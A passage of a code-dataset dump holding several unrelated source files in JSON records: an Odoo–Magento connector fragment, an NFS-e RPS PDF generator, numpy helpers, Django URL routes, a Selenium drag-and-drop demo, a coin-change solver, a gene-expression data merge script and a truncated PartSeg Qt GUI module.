self.mapped_status(\"magento.product.attribute\")\n self.mapped_status(\"magento.category\")\n self.mapped_status(\"magento.website\")\n self.mapped_status(\"magento.store\")\n self.mapped_status(\"magento.store.view\")\n self.mapped_status(\"magento.attribute.set\")\n return True\n\n @api.model\n def mapped_status(self, model):\n falseInstances = self.env[model].search([('instance_id', '=', False)])\n if falseInstances:\n falseInstances.write({'instance_id': self.id})\n return True\n \n @api.model\n def mob_upgrade_hook(self):\n activeConfigs = self.sudo().search([('active', '=', True)])\n for activeConfig in activeConfigs :\n activeConfig.sudo().test_connection()\n\n @api.model\n def _mob_def_setting(self):\n configModel = self.env['res.config.settings']\n vals = {\n 'mob_sale_order_invoice' : True,\n 'mob_sale_order_shipment' : True,\n 'mob_sale_order_cancel' : True,\n }\n defaultSetObj = configModel.create(vals)\n defaultSetObj.execute()\n return True\n","sub_path":"odoo_magento_connect/models/magento_configure.py","file_name":"magento_configure.py","file_ext":"py","file_size_in_byte":15857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"632840814","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function, unicode_literals\n\n\n#\n# RPS\n#\nfrom rps.rpsretrato import *\nfrom StringIO import StringIO\n\nclass _Prestador(object):\n pass\n\nclass RPS(object):\n def __init__(self):\n self.caminho = ''\n self.salvar_arquivo = True\n\n self.dados_rps = None\n self.rps = None\n\n self.obs_impressao = 'DANFE gerado em %(now:%d/%m/%Y, %H:%M:%S)s'\n self.nome_sistema = ''\n self.site = ''\n self.logo = ''\n self.leiaute_logo_vertical = False\n \n self.prestador = _Prestador()\n self.prestador.nome = ''\n self.prestador.cnpj = ''\n self.prestador.im = ''\n self.prestador.endereco = ''\n self.prestador.cidade = ''\n self.prestador.estado = ''\n \n self.dados_prestador = []\n\n def gerar_rps(self):\n if self.dados_rps is None:\n raise ValueError('Não é possível gerar um RPS sem a informação do arquivo xml')\n\n #\n # Prepara o queryset para impressão\n #\n #self.NFe.monta_chave()\n #self.NFe.monta_dados_contingencia_fsda()\n self.dados_rps.site = self.site\n self.dados_rps.prestador = self.prestador\n \n if self.prestador.nome == '':\n self.prestador.nome = self.dados_rps.RazaoSocialPrestador.valor\n \n if self.prestador.im == '':\n self.prestador.im 
= self.dados_rps.InscricaoMunicipalPrestador.valor\n \n for item in self.dados_rps.Itens:\n item.RPS = self.dados_rps\n\n #\n # Prepara as bandas de impressão para cada formato\n #\n self.rps = RPSRetrato()\n self.rps.queryset = self.dados_rps.Itens\n \n self.rps.band_page_header = self.rps.cabecalho\n self.rps.band_page_header.child_bands = []\n self.rps.band_page_header.child_bands.append(self.rps.prestador)\n self.rps.band_page_header.child_bands.append(self.rps.tomador)\n self.rps.band_page_header.child_bands.append(self.rps.discriminacao)\n \n self.rps.band_page_footer = self.rps.rodape\n \n self.rps.band_detail = self.rps.detalhe_item\n\n #\n # Observação de impressão\n #\n if self.nome_sistema:\n self.rps.ObsImpressao.expression = self.nome_sistema + u' - ' + self.obs_impressao\n else:\n self.rps.ObsImpressao.expression = self.obs_impressao\n\n ##\n ## Quadro do emitente\n ##\n ## Personalizado?\n #if self.dados_prestador:\n #self.rps.prestador.monta_quadro_prestador(self.dados_prestador)\n #else:\n ## Sem logotipo\n #if not self.logo:\n #self.danfe.remetente.monta_quadro_emitente(self.danfe.remetente.dados_emitente_sem_logo())\n\n ## Logotipo na vertical\n #elif self.leiaute_logo_vertical:\n #self.danfe.remetente.monta_quadro_emitente(self.danfe.remetente.dados_emitente_logo_vertical(self.logo))\n\n ## Logotipo na horizontal\n #else:\n #self.danfe.remetente.monta_quadro_emitente(self.danfe.remetente.dados_emitente_logo_horizontal(self.logo))\n\n if self.salvar_arquivo:\n #nome_arq = self.caminho + self.NFe.chave + '.pdf'\n nome_arq = 'rps_teste.pdf'\n self.rps.generate_by(PDFGenerator, filename=nome_arq)\n\n","sub_path":"pysped/nfse/processador_nfse.py","file_name":"processador_nfse.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"384806597","text":"import numpy as np\nfrom math import sqrt,floor\n\ndef init_input_matrices(size1,size2,low=0,up=1):\n A = (np.random.rand(size1[0],size1[1])*(up-low)) + low;\n B = (np.random.rand(size2[0],size2[1])*(up-low)) + low;\n return A,B\n\ndef get_procs(C_size,num):\n ar = C_size[0]/C_size[1];\n min_ratio = 100000; # arbitrary large number\n facts = num;\n flag = 0;\n if (ar>1):\n ar = 1/ar;\n flag = 1;\n for i in range(2,int(sqrt(num))+1):\n if (num%i == 0):\n ar1 = (pow(i,2))/(num);\n if abs((ar/ar1)-1) < min_ratio:\n min_ratio = abs((ar/ar1)-1);\n facts = i;\n if flag == 1:\n return (num/facts),facts\n else:\n return facts,(num/facts)\n","sub_path":"helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"450966400","text":"\"\"\"\n Create a Module \"api\" and create an empty file __init__.py in the persons app\n [simple create a folder named \"api\" and create \"__init__.py\" file containes nothing. 
It will help to detect this folder\n as a module by the system]\n Then create urls.py file here\n This is done because it's better to separate api's view logic from normal views as well as url patterns\n\"\"\"\nfrom django.conf.urls import url\nfrom django.urls import path,re_path\nfrom .views import (\n SingleApiView,\n ListAPIView\n)\n\nurlpatterns = [\n path('', ListAPIView.as_view()),\n re_path('(?P\\d+)/',SingleApiView.as_view()),\n]","sub_path":"persons/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"220768014","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom time import sleep\n\n\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(10)\ndriver.maximize_window()\ndriver.get('http://sahitest.com/demo/dragDropMooTools.htm')\n\n\ndragger = driver.find_element_by_id('dragger') # 被拖拽元素\nitem1 = driver.find_element_by_xpath('//div[text()=\"Item 1\"]') # 目标元素1\nitem2 = driver.find_element_by_xpath('//div[text()=\"Item 2\"]') # 目标2\nitem3 = driver.find_element_by_xpath('//div[text()=\"Item 3\"]') # 目标3\nitem4 = driver.find_element_by_xpath('//div[text()=\"Item 4\"]') # 目标4\n\n\n'''\ndrag_and_drop(源,目标):在源元素上按住鼠标左键,然后移动到目标元素并释放鼠标按钮。\nARGS:\t\n来源:鼠标向下的元素。 目标:要向上移动的元素。\n'''\n# ActionChains(driver).drag_and_drop(dragger,item1).perform() # 1.移动dragger到目标1\n# ActionChains(driver).click_and_hold(dragger).release(item2).perform() # 2.效果与上句相同,也能起到移动效果\n# ActionChains(driver).click_and_hold(dragger).move_to_element(item3).release().perform() # 3.效果与上两句相同,也能起到移动的效果\n\n\n'''\ndrag_and_drop_by_offset(source,xoffset,yoffset ):\n在源元素上按住鼠标左键,\n然后移动到目标偏移量并释放鼠标按钮\nARGS:\t\n来源:鼠标向下的元素。\nxoffset:移动到的X偏移量。\nyoffset:Y移动到的偏移量。\n\n'''\n# ActionChains(driver).drag_and_drop_by_offset(dragger,400,150).perform() # 4.移动到指定坐标\n\n\n\n'''\nclick_and_hold(on_element = None )\n按住鼠标左键在一个元素上。\nARGS:\ton_element:鼠标向下的元素。如果无,则单击当前鼠标位置。\n\nmove_by_offset(xoffset,yoffset ):\n将鼠标移至当前鼠标位置的偏移量\nARGS:\t\nxoffset:移动到的X偏移量,作为正整数或负整数。\nyoffset:作为正整数或负整数移动到Y的偏移量。\n'''\nActionChains(driver).click_and_hold(dragger).move_by_offset(400,150).release().perform() # 5.与上一句相同,移动到指定坐标\n\n\n\n","sub_path":"0513练习/selenium_demo11(其他动作之拖拽).py","file_name":"selenium_demo11(其他动作之拖拽).py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"539746434","text":"def howManyWays(amount, maxCoin):\n if amount == 0:\n return 1\n else:\n return sum(\n map(\n lambda chosenCoin: howManyWays(amount - chosenCoin, chosenCoin),\n list(\n filter(\n lambda coin: coin <= min(maxCoin, amount), [1, 2, 5, 10, 20, 50 ,100, 200]\n )\n )\n )\n )\n\nprint(howManyWays(10, 200))\n","sub_path":"p031/p031.py","file_name":"p031.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"419621510","text":"import os\nimport json\n\nfrom sickkidsproj import app, db\nfrom sickkidsproj.database.query import get_exonexpr_storepath\nfrom sickkidsproj.cache.g import ONE_EXPRDATA, GENCODEID_STRAND_REF, ENSEMBLID_EXONCOUNT_REF, EXPRDATA_FILEPATHS, EXT_INC\nfrom sickkidsproj.utils.check import isEnsemblId\n\n\ndef extract_gencodeid(gencodeid):\n \"\"\" splits gencode exonid to ensembl_id and exon_num based on strand +/-\n + --> exon_num += 1\n - --> exon_num = exon_count - exon_num\n\n @param gencodeid str: 
ENSG00000000003.10_0\n @rType (ensembl_id, exon_num) \n \"\"\"\n\n if gencodeid not in GENCODEID_STRAND_REF:\n raise Exception(\"invalid gencodeid {} or empty GENECODEID_STRAND_REF\".format(gencodeid))\n\n strand = GENCODEID_STRAND_REF[gencodeid]\n assert (strand == \"+\" or strand == \"-\"), \"invalid strand {} or empty GENCODEID_STRAND_REF\".format(strand)\n\n exon_num = int(gencodeid.strip().split('_')[-1])\n ensembl_id = gencodeid.strip().split('.')[0]\n exon_count = ENSEMBLID_EXONCOUNT_REF[ensembl_id]\n\n if(strand == \"+\"):\n exon_num += 1\n else:\n exon_num = exon_count - exon_num\n \n return (ensembl_id, str(exon_num))\n\n\n\ndef add_to_exonexpr(exon_expr, filename = ONE_EXPRDATA):\n \"\"\" Incorporates exon expr experimental data under /data/experiment \n to resources/exon_expr\n \n Precondition: rows sorted by ensemblid, exons of same gene are local\n\n @param filename str\n @param exon_expr {\n ensembl_id: {\n exon_num:{\n tissueSite: [ ..., read ]\n }, ...\n }, ...\n }\n \"\"\"\n\n tissueSite = filename.strip().split('-')[-1]\n \n with open(filename, 'r') as inf:\n\n inf.readline()\n iterations = 0\n\n for line in inf:\n\n row = line.strip().split('\\t')\n assert(len(row) == 5)\n\n exonid = row[3]\n read = float(row[4])\n ensembl_id, exon_num = extract_gencodeid(exonid)\n\n assert (read >= 0 and isinstance(read, float)), \"invalid read {}\".format(read)\n assert (isinstance(exon_num, str)), \"invalid exon_num {}\".format(exon_num)\n if not isEnsemblId(ensembl_id):\n continue\n\n if ensembl_id not in exon_expr:\n exon_expr[ensembl_id] = {}\n if exon_num not in exon_expr[ensembl_id]:\n exon_expr[ensembl_id][exon_num] = {}\n if tissueSite not in exon_expr[ensembl_id][exon_num]:\n exon_expr[ensembl_id][exon_num][tissueSite] = []\n\n exon_expr[ensembl_id][exon_num][tissueSite].append(read)\n\n # iterations -= 1\n # if iterations < 0:\n # break\n\n\ndef merge_exonexpr(src_exonexpr, new_exonexpr):\n \"\"\" Merges new_exonexpr into src_exonexpr\n -- new_exonexpr..tissueSite \n ---- no tissueSite key in src_exonexpr.\n ------ tissueSite: [ ..., reads ] added to src_exonexpr\n ---- appends new reads into src exon_expr tissueSite list\n\n @precondition\n -- new_exonexpr. 
cannot invent new exon_num compared to src_exonexpr.exon_num\n \n @param src_exonexpr dict\n @param new_exonexpr dict\n \n Both src_exonexpr, and new_exonexpr\n {\n exon_num: {\n tissueSite: [ ..., reads ]\n }, ...\n }\n \"\"\"\n\n src_exon_nums = list(src_exonexpr.keys()) \n\n # print(\"before\", src_exonexpr)\n for exon_num, tissueSiteReads in new_exonexpr.items():\n if exon_num not in src_exon_nums:\n raise Exception(\"Experimental data generated exon number {} not present in GTex exon_expr\".format(exon_num))\n # src_exonexpr[exon_num] is valid here\n\n for tissueSite, reads in new_exonexpr[exon_num].items():\n if tissueSite not in src_exonexpr[exon_num]:\n src_exonexpr[exon_num][tissueSite] = []\n src_exonexpr[exon_num][tissueSite].extend(reads)\n # print(\"after\", src_exonexpr)\n\n\n\n\ndef inc_data(datafiles = EXPRDATA_FILEPATHS):\n \"\"\" Incoporates exon expression located in datafiles\n into resources/exon_expr\n -- combine and format read data to exon_expr\n -- Iterates exon_expr and for each gene\n ---- queries database to locate the files storing reads under resources/exon_expr\n ---- Merge exon_expr for this gene to the corresponding file, appends `.inc` extension\n \"\"\"\n\n exon_expr = {}\n for filename in datafiles:\n add_to_exonexpr(exon_expr, filename)\n\n files_modified = []\n for ensembl_id, exon_expr_per_gene in exon_expr.items():\n src_fp = get_exonexpr_storepath(ensembl_id)\n dst_fp = src_fp + \".\" + EXT_INC\n\n # Since only a small subset in mapping is in resources/exon_expr, \n # we skip over files and continues merging only if file exists\n if os.path.exists(src_fp):\n with open(src_fp, 'r') as inf:\n with open(dst_fp, \"w+\") as outf:\n\n merged_exon_expr = json.loads(inf.read())\n merge_exonexpr(merged_exon_expr, exon_expr_per_gene)\n outf.write(json.dumps(merged_exon_expr))\n\n print(\"Merged to {}\".format(src_fp))\n files_modified.append(src_fp)\n print(files_modified)\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"sickkidsproj/analysis/inc_data.py","file_name":"inc_data.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"206445043","text":"import json\nimport logging\nimport os\nimport typing\nfrom contextlib import contextmanager\nfrom copy import copy, deepcopy\nfrom enum import Enum\n\nfrom qtpy.QtCore import Qt, Signal\nfrom qtpy.QtWidgets import (\n QAction,\n QCheckBox,\n QComboBox,\n QCompleter,\n QDialog,\n QFileDialog,\n QGridLayout,\n QGroupBox,\n QInputDialog,\n QLabel,\n QLineEdit,\n QListWidget,\n QListWidgetItem,\n QMenu,\n QMessageBox,\n QPushButton,\n QSplitter,\n QTabWidget,\n QTextEdit,\n QTreeWidget,\n QTreeWidgetItem,\n QVBoxLayout,\n QWidget,\n)\nfrom superqt import QEnumComboBox\n\nfrom PartSeg._roi_analysis.partseg_settings import PartSettings\nfrom PartSeg._roi_analysis.profile_export import ExportDialog, ImportDialog\nfrom PartSeg.common_backend.except_hook import show_warning\nfrom PartSeg.common_gui.custom_load_dialog import PLoadDialog\nfrom PartSeg.common_gui.custom_save_dialog import FormDialog, PSaveDialog\nfrom PartSeg.common_gui.mask_widget import MaskWidget\nfrom PartSeg.common_gui.searchable_list_widget import SearchableListWidget\nfrom PartSeg.common_gui.universal_gui_part import right_label\nfrom PartSegCore.algorithm_describe_base import AlgorithmProperty, ROIExtractionProfile\nfrom PartSegCore.analysis import SegmentationPipeline\nfrom PartSegCore.analysis.algorithm_description import AnalysisAlgorithmSelection\nfrom 
PartSegCore.analysis.calculation_plan import (\n CalculationPlan,\n MaskBase,\n MaskCreate,\n MaskFile,\n MaskIntersection,\n MaskSub,\n MaskSuffix,\n MaskSum,\n MeasurementCalculate,\n NodeType,\n PlanChanges,\n RootType,\n Save,\n)\nfrom PartSegCore.analysis.measurement_calculation import MeasurementProfile\nfrom PartSegCore.analysis.save_functions import save_dict\nfrom PartSegCore.io_utils import LoadPlanExcel, LoadPlanJson, SaveBase\nfrom PartSegCore.universal_const import Units\n\ngroup_sheet = (\n \"QGroupBox {border: 1px solid gray; border-radius: 9px; margin-top: 0.5em;} \"\n \"QGroupBox::title {subcontrol-origin: margin; left: 10px; padding: 0 3px 0 3px;}\"\n)\n\nMAX_CHANNEL_NUM = 10\n\n\nclass MaskDialog(QDialog):\n def __init__(self, mask_names):\n super().__init__()\n self.mask_names = mask_names\n completer = QCompleter(list(mask_names))\n completer.setCaseSensitivity(Qt.CaseInsensitive)\n self.setWindowTitle(\"Masks name choose\")\n self.mask1_name = QLineEdit()\n self.cancel_btn = QPushButton(\"Cancel\")\n self.ok_btn = QPushButton(\"Ok\")\n\n self.mask1_name.setCompleter(completer)\n self.mask1_name.textChanged.connect(self.text_changed)\n self.cancel_btn.clicked.connect(self.close)\n self.ok_btn.clicked.connect(self.accept)\n self.ok_btn.setDisabled(True)\n\n layout = QGridLayout()\n layout.addWidget(right_label(\"Mask 1 name:\"), 0, 0)\n layout.addWidget(self.mask1_name, 0, 1)\n layout.addWidget(self.cancel_btn, 2, 0)\n layout.addWidget(self.ok_btn, 2, 1)\n self.setLayout(layout)\n\n def text_changed(self):\n text1 = self.get_result()[0]\n if not text1 or text1 not in self.mask_names:\n self.ok_btn.setDisabled(True)\n else:\n self.ok_btn.setDisabled(False)\n\n def get_result(self):\n text1 = str(self.mask1_name.text()).strip()\n return (text1,)\n\n\nclass TwoMaskDialog(QDialog):\n def __init__(self, mask_names: typing.Iterable[str]):\n \"\"\"\n :param mask_names: iterable collection of all available mask names\n \"\"\"\n super().__init__()\n self.mask_names = mask_names\n completer = QCompleter(list(mask_names))\n completer.setCaseSensitivity(Qt.CaseInsensitive)\n self.setWindowTitle(\"Masks name choose\")\n self.mask1_name = QLineEdit()\n self.mask2_name = QLineEdit()\n self.cancel_btn = QPushButton(\"Cancel\")\n self.ok_btn = QPushButton(\"Ok\")\n\n self.mask1_name.setCompleter(completer)\n self.mask1_name.textChanged.connect(self.text_changed)\n self.mask2_name.setCompleter(completer)\n self.mask2_name.textChanged.connect(self.text_changed)\n self.cancel_btn.clicked.connect(self.close)\n self.ok_btn.clicked.connect(self.accept)\n self.ok_btn.setDisabled(True)\n\n layout = QGridLayout()\n layout.addWidget(right_label(\"Mask 1 name:\"), 0, 0)\n layout.addWidget(self.mask1_name, 0, 1)\n layout.addWidget(right_label(\"Mask 2 name:\"), 1, 0)\n layout.addWidget(self.mask2_name, 1, 1)\n layout.addWidget(self.cancel_btn, 2, 0)\n layout.addWidget(self.ok_btn, 2, 1)\n self.setLayout(layout)\n\n def text_changed(self):\n text1, text2 = self.get_result()\n if \"\" in {text1, text2} or text1 not in self.mask_names or text2 not in self.mask_names:\n self.ok_btn.setDisabled(True)\n else:\n self.ok_btn.setDisabled(text1 == text2)\n\n def get_result(self):\n text1 = str(self.mask1_name.text()).strip()\n text2 = str(self.mask2_name.text()).strip()\n return text1, text2\n\n\nclass FileMaskType(Enum):\n \"\"\"\n Enum for file mask types\n \"\"\"\n\n Suffix = 0\n Replace = 1\n Mapping_file = 2\n\n\nclass FileMask(QWidget):\n value_changed = Signal()\n\n def __init__(self):\n 
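# Descriptive note (added): the three input modes mirror FileMaskType -- a filename suffix, a base/replace substitution, or a path to a mapping file -- and self.values caches the last entry for each mode.\n        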
super().__init__()\n self.select_type = QEnumComboBox(enum_class=FileMaskType)\n self.values = [\"_mask\", (\"\", \"\"), \"\"]\n self.first_text = QLineEdit(self.values[0])\n self.second_text = QLineEdit()\n self.first_label = QLabel(\"Use suffix:\")\n self.second_label = QLabel(\"Replace:\")\n self.select_file_btn = QPushButton(\"Select file\")\n self.state = FileMaskType.Suffix\n\n layout = QGridLayout()\n layout.addWidget(self.select_type, 0, 0, 1, 2)\n layout.addWidget(self.first_label, 1, 0)\n layout.addWidget(self.second_label, 1, 1)\n layout.addWidget(self.first_text, 2, 0)\n layout.addWidget(self.second_text, 2, 1)\n layout.addWidget(self.select_file_btn, 3, 0, 1, 2)\n layout.setColumnStretch(0, 1)\n layout.setRowStretch(4, 1)\n self.setLayout(layout)\n\n self.second_text.setHidden(True)\n self.second_label.setHidden(True)\n self.select_file_btn.setHidden(True)\n\n self.first_text.textChanged.connect(self._value_change_wrap)\n self.second_text.textChanged.connect(self._value_change_wrap)\n self.select_type.currentIndexChanged.connect(self._value_change_wrap)\n self.select_type.currentEnumChanged.connect(self.change_type)\n self.select_file_btn.clicked.connect(self.select_file)\n\n def _value_change_wrap(self, _val=None):\n \"\"\"Pyside bug workaround\"\"\"\n self.value_changed.emit()\n\n def change_type(self, index: FileMaskType):\n if self.state == index:\n return\n if self.state == FileMaskType.Replace:\n self.values[1] = self.first_text.text(), self.second_text.text()\n else:\n self.values[self.state.value] = self.first_text.text()\n if index == FileMaskType.Replace:\n self.second_text.setHidden(False)\n self.second_label.setHidden(False)\n self.layout().setColumnStretch(1, 1)\n self.first_text.setText(self.values[1][0])\n self.second_text.setText(self.values[1][1])\n self.first_label.setText(\"Base\")\n self.select_file_btn.setHidden(True)\n else:\n self.second_text.setHidden(True)\n self.second_label.setHidden(True)\n self.layout().setColumnStretch(1, 0)\n self.first_label.setText([\"Use suffix:\", \"\", \"Path:\"][index.value])\n self.first_text.setText(self.values[index.value])\n self.select_file_btn.setHidden(index == 0)\n self.state = index\n\n def select_file(self):\n dial = QFileDialog()\n dial.setFileMode(QFileDialog.ExistingFile)\n dial.setAcceptMode(QFileDialog.AcceptOpen)\n\n if dial.exec_():\n self.first_text.setText(dial.selectedFiles()[0])\n\n def is_valid(self) -> bool:\n if self.select_type.currentEnum() == FileMaskType.Suffix:\n return bool(self.first_text.text().strip())\n if self.select_type.currentEnum() == FileMaskType.Replace:\n return \"\" not in {self.first_text.text().strip(), self.second_text.text().strip()}\n\n text = self.first_text.text().strip()\n return text and os.path.exists(text) and os.path.isfile(text)\n\n def get_value(self, name=\"\"):\n mask_type = self.select_type.currentEnum()\n if mask_type == FileMaskType.Suffix:\n return MaskSuffix(name=name, suffix=self.first_text.text().strip())\n if mask_type == FileMaskType.Replace:\n return MaskSub(name=name, base=self.first_text.text().strip(), rep=self.second_text.text().strip())\n return MaskFile(name=name, path_to_file=self.first_text.text().strip())\n\n\nclass MaskOperation(Enum):\n mask_intersection = 0\n mask_sum = 1\n\n def __str__(self):\n return self.name.replace(\"_\", \" \").capitalize()\n\n\nclass ProtectedGroupBox(QGroupBox):\n def __init__(self, text: str, parent: typing.Optional[QWidget] = None):\n super().__init__(text, parent)\n self.setStyleSheet(group_sheet)\n self.protect = 
False\n self._node_type = None\n self._parent_node_type = None\n self._replace = False\n\n def set_current_node(self, node: typing.Optional[NodeType], parent_node: typing.Optional[NodeType] = None):\n self._node_type = node\n self._parent_node_type = parent_node\n self._activate_button()\n\n def set_replace(self, replace: bool):\n self._replace = replace\n self._activate_button()\n\n def _activate_button(self, _value=None):\n raise NotImplementedError\n\n @contextmanager\n def enable_protect(self):\n previous = self.protect\n self.protect = True\n try:\n yield\n finally:\n self.protect = previous\n\n @classmethod\n def refresh_profiles(\n cls, list_widget: typing.Union[QListWidget, SearchableListWidget], new_values: typing.List[str]\n ):\n index = cls.get_index(list_widget.currentItem(), new_values)\n list_widget.clear()\n list_widget.addItems(new_values)\n if index != -1:\n list_widget.setCurrentRow(index)\n\n @staticmethod\n def get_index(item: QListWidgetItem, new_values: typing.List[str]) -> int:\n if item is None:\n return -1\n text = item.text()\n try:\n return new_values.index(text)\n except ValueError: # pragma: no cover\n return -1\n\n\nclass OtherOperations(ProtectedGroupBox):\n save_operation = Signal(object)\n\n def __init__(self, parent=None):\n super().__init__(\"Other operations:\", parent)\n self.save_translate_dict: typing.Dict[str, SaveBase] = {x.get_short_name(): x for x in save_dict.values()}\n self.save_constructor = None\n\n self.change_root = QEnumComboBox(self, enum_class=RootType)\n self.choose_save_method = QComboBox()\n self.choose_save_method.addItem(\"\")\n self.choose_save_method.addItems(list(self.save_translate_dict.keys()))\n self.save_btn = QPushButton(\"Save\")\n\n self.choose_save_method.currentTextChanged.connect(self.save_changed)\n self.save_btn.clicked.connect(self.save_action)\n\n layout = QVBoxLayout()\n layout.setSpacing(0)\n layout.addWidget(QLabel(\"Root type:\"))\n layout.addWidget(self.change_root)\n layout.addStretch(1)\n layout.addWidget(QLabel(\"Saving:\"))\n layout.addWidget(self.choose_save_method)\n layout.addWidget(self.save_btn)\n\n self.setLayout(layout)\n\n @property\n def root_type_changed(self):\n return self.change_root.currentEnumChanged\n\n def save_changed(self, text):\n text = str(text)\n save_class = self.save_translate_dict.get(text, None)\n if save_class is None:\n self.choose_save_method.setCurrentText(\"\")\n self.save_btn.setText(\"Save\")\n self.save_btn.setToolTip(\"Choose file type\")\n else:\n self.save_btn.setText(f\"Save to {save_class.get_short_name()}\")\n self.save_btn.setToolTip(\"Choose mask create in plan view\")\n self._activate_button()\n\n @property\n def expected_node_type(self) -> typing.Optional[NodeType]:\n save_class = self.save_translate_dict.get(self.choose_save_method.currentText(), None)\n if save_class is None:\n return None\n if save_class.need_mask():\n return NodeType.mask\n return NodeType.segment if save_class.need_segmentation() else NodeType.root\n\n def _activate_button(self, _value=None):\n if self._replace:\n self.save_btn.setEnabled(self._parent_node_type == self.expected_node_type and self._node_type is not None)\n else:\n self.save_btn.setEnabled(self._node_type == self.expected_node_type and self._node_type is not None)\n\n def save_action(self):\n save_class = self.save_translate_dict.get(self.choose_save_method.currentText(), None)\n if save_class is None: # pragma: no cover\n show_warning(self, \"Save problem\", \"Not found save class\")\n return\n dial = FormDialog(\n [\n 
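# Note (added): two generic fields (file suffix, sub directory) come first, followed by whatever fields the selected save class declares for itself.\n                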
AlgorithmProperty(\"suffix\", \"File suffix\", \"\"),\n AlgorithmProperty(\"directory\", \"Sub directory\", \"\"),\n *save_class.get_fields(),\n ]\n )\n if not dial.exec_():\n return\n values = dial.get_values()\n suffix = values[\"suffix\"]\n directory = values[\"directory\"]\n del values[\"suffix\"]\n del values[\"directory\"]\n save_elem = Save(\n suffix=suffix,\n directory=directory,\n algorithm=save_class.get_name(),\n short_name=save_class.get_short_name(),\n values=values,\n )\n self.save_operation.emit(save_elem)\n\n\nclass ROIExtractionOp(ProtectedGroupBox):\n roi_extraction_profile_selected = Signal(object)\n roi_extraction_pipeline_selected = Signal(object)\n roi_extraction_profile_add = Signal(object)\n roi_extraction_pipeline_add = Signal(object)\n\n def __init__(self, settings: PartSettings, parent: typing.Optional[QWidget] = None):\n super().__init__(\"ROI extraction\", parent)\n self.settings = settings\n\n self.roi_profile = SearchableListWidget()\n self.roi_pipeline = SearchableListWidget()\n self.roi_extraction_tab = QTabWidget()\n self.roi_extraction_tab.addTab(self.roi_profile, \"Profile\")\n self.roi_extraction_tab.addTab(self.roi_pipeline, \"Pipeline\")\n\n self.choose_profile_btn = QPushButton(\"Add Profile\")\n self.choose_profile_btn.setDisabled(True)\n\n self.settings.roi_profiles_changed.connect(self._refresh_profiles)\n self.settings.roi_pipelines_changed.connect(self._refresh_pipelines)\n\n self.roi_profile.currentTextChanged.connect(self._roi_extraction_profile_selected)\n self.roi_pipeline.currentTextChanged.connect(self._roi_extraction_pipeline_selected)\n self.choose_profile_btn.clicked.connect(self._add_profile)\n self.roi_extraction_tab.currentChanged.connect(self._on_change_tab)\n\n layout = QVBoxLayout()\n layout.setSpacing(0)\n layout.addWidget(self.roi_extraction_tab)\n layout.addWidget(self.choose_profile_btn)\n\n self.setLayout(layout)\n\n self._refresh_profiles()\n self._refresh_pipelines()\n self._update_btn_text()\n self.settings.roi_profiles_changed.connect(self._refresh_profiles)\n self.settings.roi_pipelines_changed.connect(self._refresh_pipelines)\n\n def set_replace(self, replace: bool):\n super().set_replace(replace)\n self._on_change_tab()\n\n def _activate_button(self, _value=None):\n if self._replace:\n self.choose_profile_btn.setEnabled(\n self._node_type == NodeType.segment\n and self.roi_extraction_tab.currentWidget() == self.roi_profile\n and self.roi_profile.currentItem() is not None\n )\n return\n self.choose_profile_btn.setEnabled(\n self._node_type in {NodeType.root, NodeType.mask, NodeType.file_mask}\n and self.roi_extraction_tab.currentWidget().currentRow() >= 0\n )\n\n def _update_btn_text(self):\n index = self.roi_extraction_tab.currentIndex()\n text = self.roi_extraction_tab.tabText(index)\n if self._replace:\n self.choose_profile_btn.setText(f\"Replace {text}\")\n else:\n self.choose_profile_btn.setText(f\"Add {text}\")\n\n def _on_change_tab(self, _val=None):\n self._update_btn_text()\n with self.enable_protect():\n self.roi_profile.setCurrentItem(None)\n self.roi_pipeline.setCurrentItem(None)\n self._activate_button()\n\n def _refresh_profiles(self):\n new_profiles = sorted(self.settings.roi_profiles.keys(), key=str.lower)\n with self.enable_protect():\n self.refresh_profiles(self.roi_profile, new_profiles)\n\n def _refresh_pipelines(self):\n new_pipelines = sorted(self.settings.roi_pipelines.keys(), key=str.lower)\n with self.enable_protect():\n self.refresh_profiles(self.roi_pipeline, new_pipelines)\n\n def 
_roi_extraction_profile_selected(self, name: str):\n if self.protect:\n return\n self._activate_button()\n self.roi_extraction_profile_selected.emit(self.settings.roi_profiles[name])\n\n def _roi_extraction_pipeline_selected(self, name: str):\n if self.protect:\n return\n self._activate_button()\n self.roi_extraction_pipeline_selected.emit(self.settings.roi_pipelines[name])\n\n def _add_profile(self):\n if self.roi_extraction_tab.currentWidget() == self.roi_profile:\n item = self.roi_profile.currentItem()\n if item is None:\n return\n self.roi_extraction_profile_add.emit(deepcopy(self.settings.roi_profiles[item.text()]))\n else:\n item = self.roi_pipeline.currentItem()\n if item is None:\n return\n self.roi_extraction_pipeline_add.emit(deepcopy(self.settings.roi_pipelines[item.text()]))\n\n\nclass SelectMeasurementOp(ProtectedGroupBox):\n set_of_measurement_add = Signal(object)\n set_of_measurement_selected = Signal(object)\n\n def __init__(self, settings: PartSettings, parent: typing.Optional[QWidget] = None):\n super().__init__(\"Set of measurements:\", parent)\n self.settings = settings\n\n self.measurements_list = SearchableListWidget(self)\n self.measurement_name_prefix = QLineEdit(self)\n self.choose_channel_for_measurements = QComboBox()\n self.choose_channel_for_measurements.addItems(\n [\"Same as segmentation\"] + [str(x + 1) for x in range(MAX_CHANNEL_NUM)]\n )\n self.units_choose = QEnumComboBox(enum_class=Units)\n self.units_choose.setCurrentEnum(self.settings.get(\"units_value\", Units.nm))\n self.add_measurement_btn = QPushButton(\"Add measurement calculation\")\n 